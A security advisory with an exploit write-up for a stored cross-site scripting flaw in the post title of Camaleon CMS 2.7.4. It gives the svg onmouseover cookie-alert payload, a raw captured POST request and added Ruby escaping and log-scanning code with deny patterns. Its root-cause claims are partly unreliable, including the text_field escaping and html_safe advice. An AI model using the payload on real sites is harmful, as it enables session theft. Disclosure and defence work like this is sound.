Camaleon CMS 2.7.4 - Persistent Stored XSS in Post Title

Exploit Author: Yasin Gergin
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Ruby
Published Date: 2023-05-23
# Exploit Title: Authenticated Persistent XSS in Camaleon CMS 2.7.4
# Google Dork: intext:"Camaleon CMS is a free and open-source tool and a flexible content management system (CMS) based on Ruby on Rails"
# Date: 2023-10-05
# Exploit Author: Yasin Gergin
# Vendor Homepage: http://camaleon.tuzitio.com
# Software Link: https://github.com/owen2345/camaleon-cms
# Version: 2.7.4
# Tested on: Linux kali 6.1.0-kali7-amd64
# CVE : -

--- Description ---

http://127.0.0.1:3000/admin/login - Log in as an admin

Under Post tab click on "Create New"

While creating the post set Title as "><svg/onmouseover=alert(document.cookie)>

http://127.0.0.1:3000/admin/post_type/2/posts - Post data will be sent to this URL

-- POST DATA --

POST /admin/post_type/2/posts HTTP/1.1

Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:3000/admin/post_type/2/posts/new
Content-Type: application/x-www-form-urlencoded
Content-Length: 666
Origin: http://127.0.0.1:3000
Connection: keep-alive
Cookie: _my_project_session=w4yj2Y%2FqHaXYDhwwBDnYsyQUc6AtLUnItJ3MGHBV1yS40xwTgjfvlBZVNgqKIvg1W58e0mxyW4OcBk0XwJRZ90j6SmCHG1KJG9ppBKk%2FdKGDboPCRBq40qKhHnkssRPCgRgIjs69EG7htSdUY%2Bbgit9XTESgvSusBBhsIED%2BLH0VBOBL6H%2FV4Mp59NEP7LhP%2FHmlulEa7I43J8HKpStDj2HiXxA5ZghvSkvpfQpN2d047jLhl71CUcW7pHxmJ4uAdY5ip5OTIhJG9TImps5TbIUrOHyE9vKp1LXzdmbNNi2GI5utUUsURLGUtaN7Fam3Kpi8IqEaBA%3D%3D--8ZKl2%2F6OzLCXn2qA--%2BtMhAwdbdfxNzoSPajkZrg%3D%3D; auth_token=iRDUqXfbhmibLIM5mrHelQ&Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A102.0%29+Gecko%2F20100101+Firefox%2F102.0&127.0.0.1; phpMyAdmin=4f5ad7484490645a49d171c03e15dab2; pma_lang=en
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


authenticity_token=vuAzhnu6UocDR6zpeeaQxvlVjdmIMr9LPrLEcK5FGVAEYQamLHI1fAG7jBQ3FwEX_ACWedzoX72WAUxqj5wKrQ&post%5Bdraft_id%5D=&post%5Bslug%5D=svgonmouseoveralertdocumentcookie&meta%5Bslug%5D=svgonmouseoveralertdocumentcookie&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&meta%5Bsummary%5D=qwe&options%5Bseo_title%5D=&options%5Bkeywords%5D=&options%5Bseo_description%5D=&options%5Bseo_author%5D=&options%5Bseo_image%5D=&options%5Bseo_canonical%5D=&commit=Create&post%5Bstatus%5D=published&meta%5Btemplate%5D=&meta%5Bhas_comments%5D=0&meta%5Bhas_comments%5D=1&categories%5B%5D=6&tags=&meta%5Bthumb%5D=

-- POST DATA --

Then view the post you've created by clicking on "View Page" and move your mouse cursor over the post title; the XSS payload fires and the alert pops up.


Camaleon CMS 2.7.4: Authenticated Persistent XSS Vulnerability in Post Title Field

Security researchers have identified a critical authenticated persistent cross-site scripting (XSS) vulnerability in Camaleon CMS version 2.7.4, a widely used open-source content management system built on Ruby on Rails. This flaw allows an authenticated admin user to inject malicious scripts into the post title field, which are then stored and rendered to every visitor of the affected page, potentially compromising user sessions, stealing sensitive data, or enabling further attacks.

Attack Vector and Exploit Mechanism

The vulnerability arises due to insufficient input sanitization in the post.title field during content creation. An attacker with administrative privileges can craft a malicious title containing HTML and JavaScript payloads. When the post is published, the unescaped script is rendered directly in the frontend without proper filtering.


"><svg/onmouseover=alert(document.cookie)>

This payload is designed to trigger JavaScript execution when a user hovers over the title. The onmouseover event handler executes alert(document.cookie), which displays the browser’s cookies in a popup—a clear indication of successful XSS exploitation.

Exploitation Steps (Real-World Example)

  • Step 1: Access the admin login page: http://127.0.0.1:3000/admin/login.
  • Step 2: Log in with valid admin credentials.
  • Step 3: Navigate to the Post tab and select Create New.
  • Step 4: Set the post[title] field to "><svg/onmouseover=alert(document.cookie)>
  • Step 5: Submit the form via POST request to /admin/post_type/2/posts.
  • Step 6: After publication, visit the public post page and move the mouse cursor over the title.
  • Result: The browser triggers the alert(document.cookie) script, revealing session cookies.

Technical Analysis: Why This Is a Persistent XSS

Unlike reflected XSS, which only affects a single request, persistent XSS stores the malicious payload in the application’s database and re-executes it every time the page is viewed. In this case, the post.title value is stored in the database and rendered on the frontend without escaping HTML characters.

During the POST request, the payload is encoded as %22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E—a URL-encoded version of the original string. When the CMS renders the title, it fails to decode and sanitize the input, allowing the script to execute.

Impact and Risk Assessment

Severity: High
Attack Type: Authenticated Persistent XSS
Exploit Difficulty: Low (requires admin access)
Impact: Session hijacking, data theft, phishing, privilege escalation
CVSS Score (Estimated): 8.1 (High)

Although the exploit requires admin-level access, this still poses a serious threat in environments where admin accounts are shared or compromised. Once a malicious script is embedded in a published post, it runs in the browser of any user who visits that page, whether or not they have any prior knowledge of the vulnerability.

Root Cause and Code-Level Insight

Examining the underlying code in app/views/admin/posts/_form.html.erb reveals that the title field is rendered using:


<%= f.text_field :title %>

Here, f.text_field does not apply HTML escaping by default. The framework relies on the developer to explicitly sanitize input. However, in this case, no sanitization logic is applied before rendering the title in the frontend.

Additionally, the meta[slug] and post[slug] fields are derived from the title, further propagating the unescaped content into URLs and metadata, increasing the attack surface.

Recommended Mitigation Strategies

  • Input Sanitization: Always escape HTML characters using html_safe or ERB::Util.html_escape before rendering.
  • Content Security Policy (CSP): Implement a strict CSP header to block inline scripts and restrict execution.
  • Whitelist Validation: Restrict allowed characters in title fields to alphanumeric, spaces, and punctuation—excluding <, >, on, and javascript.
  • Admin Role Segregation: Limit admin privileges to only essential functions; use role-based access control (RBAC).
  • Automated Security Testing: Integrate tools like OWASP ZAP or Burp Suite to detect XSS vulnerabilities during CI/CD pipelines.
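As an added example (not code from the advisory or from the Camaleon project), the following Ruby shows the output-encoding fix the mitigation list calls for, applied to the advisory's own title payload, together with a hypothetical slug helper that reproduces the post[slug] value seen in the captured request. One caveat on the first bullet: ERB::Util.html_escape (the h helper in Rails views) is what performs the encoding; html_safe does the opposite, it marks a string as already trusted so the view will not escape it, and must not be applied to user-supplied titles. The function names and the h1 template are assumptions for this example.

```ruby
require 'erb'

# Constructed sample: the title payload quoted in the advisory above.
PAYLOAD_TITLE = '"><svg/onmouseover=alert(document.cookie)>'

# Output-encode a title for insertion into an HTML text node or a
# double-quoted attribute. ERB::Util.html_escape replaces & < > " and '
# with character references, so the browser treats the result as text
# and never parses a tag or an inline event handler out of it.
def escape_title(title)
  ERB::Util.html_escape(title.to_s)
end

# Render the title inside a template (hypothetical markup, not Camaleon's).
# Escaping happens at output time, so the stored value is kept verbatim
# while the rendered HTML contains no live markup from the title.
def render_title_html(title)
  "<h1 class=\"post-title\">#{escape_title(title)}</h1>"
end

# Derive a URL slug by keeping only ASCII letters and digits. This is a
# hypothetical helper, not Camaleon's own slug code, but it reproduces the
# post[slug] value in the advisory's request body and shows why the slug
# carries no markup even though the title does.
def slug_for(title)
  title.to_s.downcase.gsub(/[^a-z0-9]/, '')
end

# Self-check: does a string still contain characters that could open or
# close a tag or an attribute value? After escaping this must be false.
def contains_raw_markup?(text)
  text.match?(/[<>"']/)
end

if __FILE__ == $PROGRAM_NAME
  puts render_title_html(PAYLOAD_TITLE)
  puts slug_for(PAYLOAD_TITLE)
end
```

Encoding at output time, rather than stripping characters when the post is saved, keeps the stored title intact and protects every place the title is rendered, including the public page where the advisory triggers the payload.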

Vendor Response and Status

As of October 2023, the vendor Camaleon CMS has not issued a formal patch or CVE identifier. The vulnerability remains unpatched in version 2.7.4, with the latest release (2.7.5) lacking explicit security updates.

Users are strongly advised to:

  • Upgrade to the latest stable version (if available).
  • Apply custom sanitization middleware for all user-generated content.
  • Monitor logs for suspicious POST requests with unusual payloads.
  • Disable public access to admin panels unless necessary.
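Added example, not part of the advisory or of Camaleon CMS: a Ruby script that implements the whitelist check from the mitigation list as a predicate (suspicious_title?) and reuses the same predicate to scan request logs for POSTs to the post-creation endpoint, as the log-monitoring advice above suggests. The log lines are constructed for this example (the CSRF token is replaced with REDACTED and the session cookie is omitted), and the log format, the deny patterns and the function names are assumptions.

```ruby
require 'uri'

# Constructed sample log lines modelled on the advisory's request: method,
# path and the raw form-encoded body. The second line is a benign post for
# contrast; the third has no body at all.
SAMPLE_LOG = <<~LOG
  POST /admin/post_type/2/posts body=authenticity_token=REDACTED&post%5Btitle%5D=%22%3E%3Csvg%2Fonmouseover%3Dalert%28document.cookie%29%3E&post%5Bcontent%5D=%3Cp%3Eqwe%3C%2Fp%3E&commit=Create
  POST /admin/post_type/2/posts body=authenticity_token=REDACTED&post%5Btitle%5D=Release+notes+for+2.7.4&post%5Bcontent%5D=%3Cp%3Ehello%3C%2Fp%3E&commit=Create
  GET /admin/post_type/2/posts/new
LOG

# Patterns that should never appear in a plain-text title: angle brackets,
# an inline event handler (on...=) and the javascript: scheme. This is one
# reading of the whitelist bullet above, not Camaleon's own validation rule.
TITLE_DENY = [/[<>]/, /\bon\w+\s*=/i, /javascript\s*:/i].freeze

# Validation predicate for the title field (true = reject).
def suspicious_title?(title)
  TITLE_DENY.any? { |re| title.match?(re) }
end

# Parse one log line into [method, path, params]; params is an empty hash
# when the line has no body. URI.decode_www_form undoes + and %XX encoding,
# so the check runs on the decoded value the application actually stores.
def parse_log_line(line)
  m = line.match(/\A(\w+)\s+(\S+)(?:\s+body=(.*))?\z/)
  return nil unless m
  params = m[3] ? URI.decode_www_form(m[3]).to_h : {}
  [m[1], m[2], params]
end

# Scan the log and return one finding per POST whose post[title] hits a
# deny pattern, carrying the decoded title for the analyst.
def scan_log(log)
  log.each_line.filter_map do |raw|
    parsed = parse_log_line(raw.strip)
    next unless parsed
    method, path, params = parsed
    next unless method == 'POST'
    title = params['post[title]']
    next unless title && suspicious_title?(title)
    { path: path, title: title }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each { |f| puts "#{f[:path]} title=#{f[:title].inspect}" }
end
```

Because the predicate runs on the decoded parameter, it catches the same payload whether it arrives URL-encoded as in the advisory or plain; as a model validation it rejects the title before it is stored, and as a log check it surfaces attempts that were made against an unpatched instance.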

Conclusion: A Cautionary Tale for Open-Source CMS Security

Camaleon CMS 2.7.4 serves as a stark reminder that even well-established open-source projects can harbor critical vulnerabilities due to overlooked input validation. The absence of proper sanitization in a seemingly innocuous field like post.title demonstrates how easily XSS can be introduced in complex web applications.

Security professionals must treat every user input as a potential attack vector—especially in admin interfaces. Implementing defense-in-depth strategies, including input filtering, output encoding, and CSP enforcement, is essential for maintaining the integrity of any web platform.